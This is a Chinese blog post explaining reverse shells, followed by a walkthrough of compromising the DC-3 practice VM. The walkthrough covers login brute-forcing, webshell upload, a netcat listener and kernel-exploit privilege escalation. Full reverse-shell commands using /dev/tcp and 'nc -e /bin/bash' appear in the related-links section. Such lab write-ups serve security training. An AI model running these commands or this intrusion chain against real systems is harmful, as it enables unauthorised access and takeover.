反弹shell_DC-3_wp

最新推荐文章于 2024-04-01 17:58:26 发布
最新推荐文章于 2024-04-01 17:58:26 发布
阅读量654 收藏 1
点赞数 2
分类专栏: 渗透学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CHUNJIUJUN/article/details/119822492
版权

反弹shell原理与实现

(转自反弹shell原理与实现 - iouwenbo - 博客园 (cnblogs.com))

什么是反弹shell?

反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。

为什么要反弹shell?

通常用于被控端因防火墙受限、权限不足、端口被占用等情形。

举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。那么什么情况下正向连接不能用了呢?

有如下情况:

1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。 

2.目标机器的ip动态改变,你不能持续控制。

3.由于防火墙等限制,对方机器只能发送请求,不能接收请求。

4.对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机等情况都是未知的,所以建立一个服务端让恶意程序主动连接,才是上策。

那么反弹就很好理解了,攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。

解释:

1. nc -lvp 6767

 -l 监听,-v 输出交互或出错信息,-p 端口。nc是netcat的简写,可实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口。

2. bash -i

-i interactive。即产生一个交互式的shell(bash)。

3. /dev/tcp/IP/PORT

特殊设备文件(Linux一切皆文件),实际这个文件是不存在的,它只是 bash 实现的用来实现网络请求的一个接口。打开这个文件就相当于发出了一个socket调用并建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。

DC-3_反弹shell环境实操_wp

搭建测试靶机

下载地址:https://www.five86.com/dc-3.html

攻击机IP:192.168.111.137

靶机DC-3IP:192.168.111.141

靶机开机是这样的

 

信息收集

nmap进行内网主机探测,得到靶机IP:192.168.111.141

nmap -sn 192.168.111.0/24

 

端口扫描

只扫到一个80端口

目录扫描

扫到这两个目录有点用

 

主页探测

先看看端口的主页,一个登录框,提示说只有一个flag和一个注入点,你要获得root权限和观察系统信息

 

后台登录

我们刚刚扫到的administrator是后台登录界面

 试了几个弱口令没用,再找找信息,看看我们扫到的另外一个目录,打开找到一个配置文件的路径,进去看看

翻了翻没得到什么有用信息,但是我们发现目录是在administor下的,猜测后台用户名就是administor或者admin,然后就没什么可用信息了

 

后台爆破

后台登录框抓包

 

 爆破成功拿到用户名和密码登录后台

 

 登进来以后,我们需要找可以上传代码或编写代码的Joomla具有包含PHP代码模板

 

找了很久才找到一个服务器文件管理的点

这里我们在html下新建一个文件夹

 

然后新建一个文件上传一个一句话木马试试

 

 通过这几个我们得到文件路径

 点进去发现已经解析了

连接蚁剑试试,发现连不上,这里可以滑倒我们文章最上边去看看我补充的反弹shell的知识,这里是因为靶机中了网马,但是它在局域网内,所以直接连接不了,所以我们采用反弹shell去获取权限

反弹shell

在攻击机中输入写入nc命令,进行监听;
nc -lvvp 5555

在刚刚服务器文件管理的地方在上传一个反弹shell的木马 

访问执行一下

攻击机nc连接,监听端口,这时候将在攻击机上得到反弹的getshell

一键四连,获取目标主机的操作系统版本,以及该getshell的ID号,对应版本为Ubuntu 16.04

用searchsploit搜索可以利用的漏洞

 searchsploit Ubuntu 16.04

 查看漏洞介绍
cp /usr/share/exploitdb/exploits/linux/local/39772.txt  ubuntu-1604-shell.txt
cat ubuntu-1604-shell.txt

cat后最下边有下载链接,由于得到靶机的shell内无法直接下载文件,先通过攻击机下载该39772文件,路径为:https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip


使用攻击机进行下载
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

解压:

unzip 39772

攻击机中当前路径开启python.server,供靶机下载:

python -m SimpleHTTPServer 6666

用python开启服务器后,在靶机下载39772文件,然后解压该文件

得到一个compile配置文件

 

发现是用来编译下边的 .c 文件的

 给compile.sh执行权限,并执行文件,对doubleput.c文件进行编译,编译完成后得到doubleput文件

 执行编译好的doubleput文件

 得到root权限,cd进去,拿到flag,成功

 

tacooo
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
DC-3WP
SHJ1395的博客
11-02 89
查找出靶机IP地址,利用nmap或者arp -scan -l扫描存活主机。找出靶机的最终flag
DC-3(失败的wp)
weixin_42238862的博客
02-20 248
中间咸鱼了几天,着实不想学习那几天,就放下电脑去学习了一下python的自动化测试技术。然后那边告一阶段之后继续来这边打靶机写文章了,前期靶机无非是学习各种工具的使用,并且学会有耐心的查找许多资料,前几天不想写就是因为这个靶机打了一个下午没有找到入口点,这几天学习职后发现其实很简单。 还是老样子,确定目标主机的IP 找到目标主机为192.168.11.104,然后nmap开路 扫描之后发现只有80端口是开放的,那当然去看看它的前端页面,然后提示说只有一个入口,让我们尝试去得到flag,就是这里,我当然是
反弹shell的方法和场景
最新发布
weixin_45653478的博客
04-01 763
nc64.exe -lvvp 1111 -e C:\Windows\System32\cmd.exe windows机器nc64.exe -lvvp 1111 -e /bin/bash linux机器。
反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载
zrx9988的博客
05-15 407
所谓的正向连接以及反向连接都是需要根据参照物来进行确认的,所举的例子均是以Linux外网服务器为参照;当存在命令注入漏洞时,就需要使用连接符,将上述命令进行拼接执行。反向连接就是我把我的IP与端口号交出去,等待别人来控制我;正向连接就是主动出击,去控制别的服务器;示例:(Windows控制Linux)Linux控制Windows。Windows控制Linux。外网去控制内网的主机。
day01 操作系统&文件下载&反弹shell&防火墙绕过
wanjia01的博客
03-03 5609
#知识点: 1、名词解释-渗透测试-漏洞&攻击&后门&代码&专业词 2、必备技能-操作系统-用途&命令&权限&用户&防火墙 3、必备技能-文件下载-缘由&场景&使用-提权&后渗透 4、必备技能-反弹命令-缘由&场景&使用-提权&后渗透 前后端,POC/EXP,Payload/Shellcode,后门/Webshell,木马/病毒, 反弹,回显,跳板,黑白盒测试,暴力破解,社会工程学,撞
[CTF]-反弹shell[2]
Mr.木Mu
05-27 1549
[二]反弹shell的本质开放端口(腾讯云,宝塔面板)什么是反弹shell反弹shell的本质是什么bash -i/dev/tcp/ip/port实例1:实例2:交互重定向>&、&>常见的反弹shell 的语句怎么理解1234结束极客大挑战where_is_my_FUMO 开放端口(腾讯云,宝塔面板) 测试反弹shell 需要保证端口开放 打开腾讯云 --> 打开安全组 --> 添加规则 添加入站规则 完成之后–> 一键放通 然后进入宝塔面板
k_shell.rar_K-shell_k-shell MATL_k-shell matlab_k_shell_matlab k
07-13
根据k-shell算法,对网络进行划分,得到每一层的子网
Python库 | adb_shell-0.0.9-py3-none-any.whl
04-27
资源分类:Python库 所属语言:Python 资源全名:adb_shell-0.0.9-py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Linux_Shell-programming.zip_Linux shell_linux
09-24
Linux shell 编程基础知识,可供学习Linux shell环境下编程使用。
complex-network.zip_SIR matlab_k shell_k-shell matlab_matlab k-s
07-15
复杂网络工具箱,包括SIS、SIR模型等,及度、k-shell的计算等。
DC.zip_DC shell_Linux dc
09-24
linux shell ( Visual C++ Books)
linux反弹shell的原理详解
01-08
完整命令 反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一个交互式的bash &是为了区分文件1和文件描述符1的 a>&b 的意思是 a>b 2>&1 0代表输入 ,0>&1 意思是,将输出的窗口上所输入的值当作当前窗口的输入。反弹shell后会有两个窗口,即靶机的shell窗口
靶机DC-3—WP
m0_66638011的博客
05-17 1080
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
反弹shell初识
无痕的博客
11-01 3928
反弹shell的指令与演示
渗透靶场 Vulnhub:dc-3 简单复现
qq_47168481的博客
09-12 289
渗透靶场 DC-3 复现
反弹Shell原理与实现
m0_62451321的博客
11-14 3032
Windows作为攻击者主机,Linux是被入侵主机(目标主机),此时目标主机上只要能正常运行Linux命令便可以实现反弹,利用Linux的Bash命令重定向和Windows上的Netcat应用程序,如果没有,则网络下载netcat应用程序即可。远程桌面,Web服务,SSH,SMB等等,都是正向连接。(3)对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。(1)某客户机中了你的木马,但是它在局域网内,你直接连接不了。
靶机测试--SickOs1.2【PUT漏洞】
ximo的博客
04-04 329
目录PUT漏洞信息收集漏洞利用反弹shell提权 PUT漏洞 通过PUT请求方式,上传文件。 参考链接:https://www.cebnet.com.cn/20180810/102513443.html 信息收集 主机发现: 端口扫描: 目录扫描: 漏洞利用 一、探测服务器是否开启PUT方式 burpsuite探测 二、上传文件 1.burpsuite上传: 修改为PUT方式,并在存在PUT漏洞的的目录下创建文件及文件内容。 查看目录: 执行命令: 2.curl 命令上传: curl -i -
反弹shell从入门到进阶
飞鱼的企鹅的博客
10-14 314
前言 在渗透测试过程中,反弹shell是获取到权限的一种很重要的方式,一直用那些反弹shell的命令却不知道是什么意思,现在来专门学习一下原理。 什么是反弹shell 反弹shell(reverse shell),就是监控端在监控某TCP/UDP端口,被控制端使用漏洞或其他方法发起请求到该端口,并将其命令行的输入输出转到控制端。 为什么要反弹shell 当我们已经打开了被攻击机的相应端口,如22,...
dc_shell -verbose
08-10
dc_shell -verbose 是一个在设计编译(Design Compiler)中使用的命令,用于以详细模式运行该工具。 通过添加 -verbose 参数,dc_shell 将提供更详细的输出信息,帮助用户更好地了解设计编译过程中的各个步骤和操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值